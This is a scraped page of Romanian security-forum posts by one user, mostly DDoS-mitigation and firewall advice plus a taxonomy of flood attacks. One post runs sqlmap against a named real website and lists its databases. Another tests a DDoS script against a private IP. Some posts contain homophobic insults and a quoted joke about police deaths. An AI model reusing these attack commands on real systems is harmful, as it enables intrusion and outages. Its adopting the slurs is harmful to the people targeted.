-
Posts
5013 -
Joined
-
Last visited
-
Days Won
398
Everything posted by aelius
-
@Hennessey: Succes cu SRL-ul si cu pseudo-diplomele lor. Tu chiar crezi ce scrie pe site-ul lor ? Pana si domeniul lor e pus cu privacy. De ce saracia ai pune privacy la domeniul sub care iti faci business-ul ? Domain Name: LINK-ACADEMY.COM Registrar: GODADDY.COM, LLC Whois Server: whois.godaddy.com Referral URL: http://registrar.godaddy.com Name Server: NS1.IT-AKADEMIJA.COM Name Server: NS2.IT-AKADEMIJA.COM Status: clientDeleteProhibited Status: clientRenewProhibited Status: clientTransferProhibited Status: clientUpdateProhibited Updated Date: 12-mar-2012 Creation Date: 12-mar-2012 Expiration Date: 12-mar-2013 Administrative Contact: Private, Registration LINK-ACADEMY.COM@domainsbyproxy.com Domains By Proxy, LLC DomainsByProxy.com 14747 N Northsight Blvd Suite 111, PMB 309 Scottsdale, Arizona 85260 United States (480) 624-2599 Fax -- (480) 624-2598 "În România exist?m din anul 2010. Din aceast? regiune am avut, pân? acum, un num?r considerabil de cursan?i." ; Si cum isi faceau publicitate ? Cu porumbeii voiajori poate, ca domeniul este inregistrat pe 12 martie 2012. De asemenea, daca isi desfasoara activitatea in Romania, de cine sunt acreditati ? Astia si cu spiru haret ; te scuipa lumea daca le arati papirusul
-
Chat-ul rst: http://www.share-images.org/images/8yk1ix4zrj1fv5ogi86.png Discutie pe chat: (15:42:42) passfig: ca cacat (15:42:50) passfig: ce* (15:42:53) Ciresel21: iti dau tie NDDOS? (15:42:54) Ciresel21: (15:42:57) alecseu: E nasoleala treaba.. (15:43:08) oul: e un bug ceva... (15:43:18) alecseu: Da... (15:43:25) alecseu: E de la hosting (15:43:29) alecseu: Nu mai face fata (15:43:31) alecseu: )))))))))))))))))))) (15:43:59) fallen_angel: b? (15:44:01) fallen_angel: se lucreaz? (15:44:03) fallen_angel: da ce ?tii tu (15:44:04) fallen_angel: (15:44:39) alecseu: Da.. (15:44:40) fallen_angel: .. (15:44:44) alecseu: E problema la sv. de mysql cred. (15:44:51) fallen_angel: de cs (15:44:53) fallen_angel: (15:45:03) RST: DarkyAngel logs into the Chat. (15:45:05) fallen_angel: e de la radio (15:45:08) fallen_angel: )))))))))) (15:45:22) alecseu: Darky m@n3 (15:45:23) DarkyAngel: salut salut (15:45:29) Ciresel21: salut (15:45:39) Ciresel21: ba alecseu da ce le stii tu pe toate=)) (15:45:58) fallen_angel: b? alecseu Eu stergeam sesiunile la fiecare doua secunde
-
Mai bine invatati singuri si pentru certificare, vedeti ceva pe afara, cand aveti resurse. Diplomele din Romania nu sunt luate in considerare afara. Printre singurele recunoscute sunt cele de la politehnica si automatica, in rest, va vor folosi ca hartie igienica. O diploma de la un SRL ca asta, nu va ofera nimic. Asa haideti ca-mi fac si eu RTFM Academy, am undeva la +14 ani de linux in spate si va dau diplome (bune de sters la fund). Cine credeti ca le va recunoaste ?
-
(09:44:45) ralex: am mai scapat azi de 3 militieni (09:44:45) ralex: http://stirileprotv.ro/stiri/act?ualitate/trei-politisti-au-murit-?si-al-patrulea-este-ranit-grav-du?pa-ce-s-au-rasturnat-cu-masina-in?-giurgiu.html (09:44:58) ralex: cu ajutorul lu dumnezeu se fac 4
-
Salut, 22 (ssh) il poti accepta doar de la surse bine stabilite (ex: home, work) si apoi faci DROP pe restul. 25 este smtp, daca nu ai server de email pe server, il poti bloca la INPUT; Email-urile de confirmare de la site-uri se trimit si asa. 585 este smtp submission, nu ai nevoie de el 3306 este mysql, nu ai nevoie de el decat pe localhost, poti seta in my.cnf sa faca bind doar pe 127.0.0.1 9000 (php-fpm sau fastcgi) trebuie listat doar pe localhost, nu pe ip-ul public. Deci iti ramane doar 80 open. In legatura cu iptables-ul, nu stiu daca iti permite vps-ul asta (banuiesc ca e openvz). Ar trebui sa recompilezi iptables (iti trebuie si sursele kernelului)
- 25 replies
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with:
-
Nu nu 29602 este size (Length) si este prezent in pachetul tcp sub alta forma (daca faci debug cu tcpdump se vede) # du -csh testing.300mb.txt 301M testing.300mb.txt 301M total -------------------------------- Log-ul de la wget: [25/Sep/2012:21:00:51 +0200] "GET /testing.300mb.txt HTTP/1.0" 200 314573125 "-" "Wget/1.13.4 (freebsd8.2)" Se vede acolo 314573125 ? saturn ~ # echo 314573125/1024/1024|bc 300 => dimensiunea fisierului PS: "-t filter" se specifica degeaba in iptables. INPUT, OUTPUT si FORWARD sunt default in filter (sunt chain-uri de filtrare, nu de marcare) @ilbr22: nu iti merg reguli cu string pentru ca nu ai suport iptables pe acel vps. Ia verifica daca ai asa ceva: saturn ~ # find /lib/modules/`uname -r` -name xt_string.ko /lib/modules/2.6.32.15-1-grsec/kernel/net/netfilter/xt_string.ko
- 25 replies
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with:
-
Pune-l sa ia un hosting mai ok. Sa intrebe in prealabil ce memory_limit are in php. Trebuie minim 128M sa mearga decent. (Majoritatea hosterilor au 32/64 M). Daca isi ia VPS sau un server, recomand nginx + php-fpm in loc de apache ; Aici trebuie sa iei in vedere faptul ca ar avea nevoie de un om sa faca update-uri & stuff pe server.
-
Cel mai modern data center Un PC pentru impatimitii de facebook
-
Mai jos, o sa va prezint majoritatea tipurilor de atac dos/ddos cat si ce anume vizeaza ele. Am omis din lista atacurile ce tineau de anii 95 (igmp, nuke, windows 95 based. Subiectul este ocolit de multi pentru ca sunt foarte putine companiile care ofera solutii reale de filtrare a atacurilor (de regula este bullshit de marketing), iar cele care ofera astfel de solutii, este logic ca le tin private, pentru ca preturile sunt extrem de mari iar tehnologiile de filtering sunt putine si de multe ori ineficiente in fata atacurilor “moderne”. Cam atat despre asta pentru moment, si sa trecem la subiectul acestui tutorial. [*] UDP Flood Congestia conexiunii. Este un atack ce 'consuma' latimea de banda. [*] ICMP Flood Congestia conexiunii. Este un atack ce 'consuma' latimea de banda. [*] TCP Flood (SYN) Congestia conexiunii. De asemenea, consuma ciclii de procesare (Epuizarea resurselor CPU). Poate face inoperabil OS si poate folosi toti socketii disponibili. Incarca tabelele de conexiuni si face sistemul sa nu accepte conexiuni noi, pentru ca lista de asteptare (queue) devine plina. Daca este cu sursa spofata si numarul de pachete este considerabil, este aproape imposibil de filtrat. Poate fi ameliorat efectul doar cu echipamente specializate sau distribuirea serviciilor in clustere. FreeBSD are un sistem relativ bun de protectie pentru acest lucru (synproxy), insa la foarte multe sesiuni tcp noi pe secunda, acesta nu face fata cu un singur sistem folosit pentru filtrare. De asemenea, pe FreeBSD exista mai multe mecanisme pentru acest lucru. Unul dintre acestea este syncache. O alta metoda de a ameliora efectele sale, sunt reducerea timpilor de acceptare a conexiunilor. Este cel mai 'profi' atac (D)DoS. [*] Smurf attack Congestia conexiunii. Atacurile smurf se mai numesc si 'ICMP amplification attack' sau 'Reflection Attack'. Acest tip de atack vizeaza adresa broadcast. [*] Fraggle attack Congestia conexiunii. Fraggle este un tip de flood asemanator cu Smurf, insa pachetele trimise sunt UDP. Acest tip de atack vizeaza adresa broadcast, DST PORT 7 (echo) [*] Papasmurf attack Congestia conexiunii. Acest tip de flood este un hibrid rezultat din combinarea atacurilor Fraggle+Smurf. [*] Land attack Daca serverul vizat este linux, in majoritatea cazurilor kernelul da crash. Sursa atacului este alterata, astfel incat devinde identica cu destinatia, fapt pentru care, kernelul incepe sa-i(si) raspunda cu 'ack'. (war ack) Nota: Nu am idee daca mai functioneaza la kernel 2.6.x ; La FreeBSD nu functioneaza pentru ca are un sistem de protectie ce face sa nu accepte pachete din afara cu adresa ip configurata pe interfata. [*] Eyenetdee Acest tip de atack este foarte asemanator cu 'Land attack', diferenta este ca sunt folosite pachete SYN. Tinta acestui atac sunt aplicatiile, in special pop3, imap si ftp. (probabilitatea de a bloca aplicatiile) [*] DNS Amplification Attack Congestia conexiunii. De asemenea, consuma ciclii de procesare (Epuizarea resurselor CPU) Aceste atacuri se bazeaza pe baza 'amplificarii' in intensitate, din cauza folosirii interogarilor recursive. Din moment ce vizeaza doar serviciul DNS (bind/named), in cazul in care este bine configurat si nu accepta interogari recursive, acest atac nu are randament. [*] TCP Fin Flood (spoofed) Acest tip de flood consuma ciclii de procesare (Epuizarea resurselor CPU), in cazuri rare genereaza si congestiunea conexiunii. Sursa pachetelor este alterata (spoofata) iar pachetele tcp au flag-ul FIN setat. Este usor de filtrat, in special pe FreeBSD. [*] TCP RST flood (spoofed) Acest tip de flood consuma ciclii de procesare (Epuizarea resurselor CPU) si genereaza congestiunea conexiunii. Sursa pachetelor este alterata (spoofata) iar pachetele tcp au flag-ul RST setat. Este relativ usor de filtrat. [*] TCP ACK (spoofed) Acest tip de flood consuma ciclii de procesare (Epuizarea resurselor CPU) si genereaza congestiunea conexiunii. Sursa pachetelor este alterata (spoofata) iar pachetele tcp au flag-ul ACK setat. [*] SIP Flood Acest tip de atac are ca tinta echipamentele VoIP si vizeaza blocarea lor. Se bazeaza pe trimiterea de mesje 'INVITE' catre porturile 5060, 5061 (in general) Nota: o sa fie alt subiect despre atacurile dos/ddos low-bandwidth based.
- 5 replies
-
- ddos
- denial of service
-
(and 2 more)
Tagged with:
-
Sa nu va mai certati de pomana: hp ~ $ mkdir rst hp ~ $ cd rst/ hp rst $ curl -o ala.rar http://netcologne.dl.sourceforge.net/project/dequiem/Dequiem2.0/Dequiem2.0%28Test%29.rar % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 4421 100 4421 0 0 32760 0 --:--:-- --:--:-- --:--:-- 80381 hp rst $ unrar x ala.rar UNRAR 3.93 freeware Copyright (c) 1993-2010 Alexander Roshal Extracting from ala.rar Creating Dequiem2.0 OK Creating Dequiem2.0/Deq OK Extracting Dequiem2.0/Deq/ddos.py OK Extracting Dequiem2.0/Deq/findip.py OK Extracting Dequiem2.0/Deq/help.py OK Extracting Dequiem2.0/Deq/main.py OK Extracting Dequiem2.0/Deq/portscan.py OK Extracting Dequiem2.0/Deq/SQLi.py OK Extracting Dequiem2.0/Dequiem2.0.py OK All OK hp rst $ cd Dequiem2.0/Deq hp Deq $ python ddos.py DDoS mode loaded Site you want to DDoS:172.16.0.2 Port you want to attack:80 Input the message you want to send:testeeeeeeeeeeeee How many connections you want to make:1000 [172.16.0.2] [Ip is locked] [Attacking 172.16.0.2] +----------------------------+ |[DDoS Attack Engaged] | |[DDoS Attack Engaged] | |[DDoS Attack Engaged] | |[DDoS Attack Engaged] | |[DDoS Attack Engaged] | |[DDoS Attack Engaged] | |[DDoS Attack Engaged] | ............ ............ The connections you requested had finished Do you want to ddos more? Statistica real time la dst port 80: => Currently 67.13 kBps/655.00 pps, Average: 1.42 kBps/10.87 pps => Currently 61.78 kBps/1.05 kpps, Average: 2.07 kBps/22.04 pps => Currently 63.02 kBps/1.07 kpps, Average: 2.72 kBps/33.19 pps => Currently 58.96 kBps/1.00 kpps, Average: 3.31 kBps/43.37 pps => Currently 62.07 kBps/1.06 kpps, Average: 3.92 kBps/53.91 pps => Currently 60.45 kBps/1.03 kpps, Average: 4.50 kBps/64.02 pps => Currently 60.33 kBps/1.03 kpps, Average: 5.07 kBps/73.88 pps => Currently 62.82 kBps/1.07 kpps, Average: 5.65 kBps/83.94 pps => Currently 60.70 kBps/1.03 kpps, Average: 6.20 kBps/93.40 pps => Currently 59.61 kBps/1.01 kpps, Average: 6.73 kBps/102.48 pps => Currently 61.78 kBps/1.06 kpps, Average: 7.27 kBps/111.87 pps => Currently 18.80 kBps/325.00 pps, Average: 7.38 kBps/113.94 pps Concluzia: Scriptul este gandit prost. Daca vreti ceva "low bandwidth", folositi slowloris. * Nota: tool-ul folosit pentru analiza traficului este "rate" ("/usr/ports/net-mgmt/rate" la FreeBSD)
-
Si tu ce sari asa ca scroafa homosexuala fara sa citesti regulile ? Ban 7 zile. Ai timp sa dai cu pingu-n localhost de nebun. Thread closed, ca si asa era deschis de alt labar cu impresii de hacker.
-
spune bre ca esti student si cauti coleg pentru a pune impreuna la chirie, ca imediat apar baietii glumeti si o sa spuna ca esti poponar! ps: modific eu titlul ala din "Caut" in altceva. // edit: ah, cauti colega, nu coleg )
-
rooturi, sigur ca da Cumpar topor!
-
Ce sintaxa vrei frate, nu te uiti ce scrie la el la location ? Toata treaba aia a durat doua secunde. Ce ca**t de hacking e asta ? A luat un link si a dat cu sqlmap pe el hp ~ # sqlmap -u "http://www.mida.ro/content.php?id=21" --dbs --union-use sqlmap/0.8 - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 23:48:13 ............... web server operating system: Linux Fedora web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 5 [23:48:14] [INFO] fetching database names available databases [23]: [*] ambalaj_ccihr [*] costides_cartuse [*] costides_corvina [*] costides_dekoratex [*] costides_sazy [*] costides_transilva [*] csalad [*] csikisport [*] hardwarecenter_hc [*] hardwarecenter_szamla [*] information_schema [*] markbi [*] mida [*] munkacsy [*] mysql [*] parfum [*] parfumworld [*] salvator [*] syrinx [*] test [*] twinart [*] vkv [*] zarafa gata frate, am dat o comanda si sunt hacker, o sa fiu in imparatia cerului, ia sa-l pun inca odata pe show off pe RST, poate o sa capat respectul baietilor, ca sunt bazat
-
Citeste regulile forumului te rugam. Aceasta sectiune este pentru altceva iar ultimul raspuns in acest thread a fost acum 1 an. Esti liberi sa deschizi un thread in sectiunea "Ajutor" in care sa spui problema cu lux de amanunte. Exemplu: Am un stick wireless marca ____, folosesc OS _____, incerc sa fac _____ insa primesc eroarea ____ ...... Daca nu stii sa pui intrebari, nu te astepta sa primesti raspunsuri. Thread closed
-
E o vorba buna: "Do not try to invent your own internet". Un 404 poate aparea oricand in site in urma unui link incorect sau chiar a faviconului lipsa. //edit: @ibr22: Problema cu 404 nu ar intra in aceasta sectiune, ci intr-o discutie legata de servere web sau special pentru nginx. Este abordata gresit chestia cu proxy_pass ; Nu dorim ca requesturile sa se faca in continuare prin serverul nostru. As opta pentru rewrite. error_page 404 /404.html; location = /404.html { rewrite . http://www.google.com/ last; }
- 25 replies
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with:
-
Instaleaza mod_rpaf pe apache pentru a vedea adresele ip reale ale utilizatorilor (ai frontend+backend). Poti bloca ce e mai sus foarte simplu: iptables -I INPUT -p tcp --dport 80 -m string --string "UNSOFT" --algo bm -j REJECT --reject-with tcp-reset Sau daca vrei sa blochezi adresele ip (instaleaza rpaf inainte, sa-ti afiseze corect adresele ip in loc de 127.0.0.1): for i in `grep UNSOFT /calea/catre/apache.log |awk '{print $1}'` ; do iptables -I INPUT -p tcp -s $i --dport 80 -j DROP;done Sau, daca tot ai nginx in fata apache-ului, poti redirecta ce e 404 catre google.com; Nu o sa iti mai ajunga requesturile in apache si nu va mai consuma resurse. Pentru mitigarea atacurilor dos/ddos HTTP recomand varnish. Utile: - https://www.rtfm.ro/tuning/avantajele-folosirii-arhitecturilor-web-dual-strat/ - https://www.varnish-cache.org
- 25 replies
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with:
-
Promovare website Black SEO implicare Google
aelius replied to Flubber's topic in Black SEO & monetizare
Si primesti raspuns de la Gheorghe: Va rog sa-mi specificati partenerul dumneavoastra precum si dovada precum ca acestia au acceptul meu prealabil de a primi email-uri cu caracter comercial de la acesta sau partenerii sai. Spam sucks //edit: in prealabil, in discutie se adauga frumos la CC email-ul de abuz al hosterului. restul nu are rost sa se discute, asta spune clar totul: “Este interzisa efectuarea de comunicari comerciale prin utilizarea unor sisteme automate de apelare care nu necesita interventia unui operator uman, prin fax sau posta electronica, sau prin orice alta metoda care foloseste serviciile de comunicatii electronice destinate publicului, cu exceptia cazului in care abonatul vizat si-a exprimat in prealabil consimtamantul expres de a primi asemenea comunicari” Tot spam sunt si email-urile de la facebook "x prieten te invita sa ..." Deci x prieten ma invita dar defapt nu ma invita el, ci reteaua de socializare dupa ce i-au furat email-urile. Daca vrea X sa ma invite pe gunoi.ro, sa o faca telefonic. Orice email trimis grupa si nesolicitat este spam. Daca vrei iti dau cateva email-uri de la mine catre diverse companii de hosting, sa vezi cum le-au disparut site-urile baietilor in 20 de minute de la report. -
Promovare website Black SEO implicare Google
aelius replied to Flubber's topic in Black SEO & monetizare
Legea 506/2004, articolul 12 prevede urmatoarele: “Este interzisa efectuarea de comunicari comerciale prin utilizarea unor sisteme automate de apelare care nu necesita interventia unui operator uman, prin fax sau posta electronica, sau prin orice alta metoda care foloseste serviciile de comunicatii electronice destinate publicului, cu exceptia cazului in care abonatul vizat si-a exprimat in prealabil consimtamantul expres de a primi asemenea comunicari” Deci, labareala din email-uri de la final cu "Adresa dvs a fost gasita pe un site public; Email-ul nu este si nu poate fi considerat spam cat si invocarea legii 365/2002 cu modificarile aduse prin legea 121/2006 privind comertul electronic" este de pomana. -
Server side doar. Magento e praf rau de tot. Daca ai VDS, iti pot da niste sfaturi.
-
Daca este cu adrese ip diferite, le ataca independent. Solutia la ideea ta ar fi in felul asta: 1. Pachetele merg in router. 2. Din router se face multipath routing catre serverele cu FreeBSD care au ip-uri private (elimini posibilitatea de a fi atacate independent) 3. Se face filtering pe cele 3-4-5 servere cu FreeBSD. 4. Traficul se intoarce catre router. 5. Traficul intors din sistemele FreeBSD, este routat catre adresa ip a clientului/serverului. PS: Prezenta routerului sa stie de multipath, load balancing, policy routing & more, intra deja la echipamente specializate. Costul acestora sunt cu 4-5 zero-uri in euro si decat sa faci asta, te costa mai putin sa cumperi direct un o scula hardware care sa filtreze. (Costurile sunt enorme in ambele cazuri)
- 25 replies
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with:
-
Iti va epuiza latimea de banda inainte de asta. Daca resursele primului server sunt epuizate, nu va mai trece deloc trafic catre serverul cu serviciile. Cum am spus, nu exista o solutie completa si perfecta pentru protectie. Un server decent cu FreeBSD iti duce undeva la 500.000 de pachete pe secunda. Uite un log de pe un server. Sunt + 400kpps; Atacul era UDP de la surse multiple. Feb 23 02:48:59 hp glflow: DOS ATTACK: – 450152.33 packets/s Feb 23 02:49:05 hp glflow: DOS ATTACK: – 429905.50 packets/s Feb 23 02:49:17 hp glflow: DOS ATTACK: – 433208.17 packets/s Feb 23 02:49:23 hp glflow: DOS ATTACK: – 412169.50 packets/s Feb 23 02:49:28 hp glflow: DOS ATTACK: – 457770.83 packets/s Feb 23 02:49:35 hp glflow: DOS ATTACK: – 440214.50 packets/s In momentul atacului de mai sus, serverul se comporta ok.
- 25 replies
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with:
-
Sigur, FreeBSD are atat netfilter cat si packet filter. In legatura cu prima intrebare legata de bandwidth: Nu exista protectie DDoS, toate sistemele si echipamentele folosite pentru filtrare, nu fac altceva decat sa inlature efectele atacurilor (sa permita utilizatorilor legiti sa acceseze un serviciu). Deci, chiar daca un atac dos sau ddos este filtrat de catre voi (endpoint), latimea de banda va fi utilizata. Singurul lucru ce il face un filtru: - Daca este in routing, nu permite trecerea traficului catre client/server servicii. - Daca este pe serverul ce ruleaza serviciile, face ca pachetele sa fie ignorate (cele cu reguli de filtrare sau nullroute) In legatura cu BGP-ul: Daca ai numar AS (Autonomous System) se intelege ca poti face routari dinamice utilizand BGP. Acolo ai mai multe metode de a filtra un atac dos/ddos (ex: comunitati bgp, blackholing, etc ..) Se pot vedea si aici cateva chestii: - https://rstcenter.com/forum/46523-nullrouting.rst - https://www.rtfm.ro/ddos/tipuri-de-atacuri-denial-of-service/
- 25 replies
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with:
-
Pentru @Zatarra: Pentru filtrarea atacurilor, daca nu exista un echipament specializat, as recomanda un server cu FreeBSD pus inainte de serverul cu servicii. (sau chiar serverul cu servicii sa fie FreeBSD) Pe el poti face urmatoarele: (cu pachet filter) - definirea unui numar maxim de conexiuni de la o sursa catre destinatie cat si catre un serviciu explicit. - definirea unui numar maxim de conectiuni pe secunda de la o sursa catre destinatie cat si catre un serviciu explicit - definirea de liste de acces (ACL) cat si masura luata pentru primele doua cazuri (exemplu: blocarea surselor pentru un anumit timp, limitarea conexiunilor, blocarea aleatoare a pachetelor pana la un anumit procent) - definirea numarului maxim de conexiuni acceptate pe un serviciu. Exemplu: putem defini cu pf un numar maxim de 3000 'tcp states' catre web, astfel incat, daca avem un atac de mare intensitate, singurul serviciu nefunctional va fi web-ul, nu tot serverul sau toate aplicatiile (evitarea epuizarii socketilor disponibili)
- 25 replies
-
- atacuri ddos
- ddos
-
(and 2 more)
Tagged with: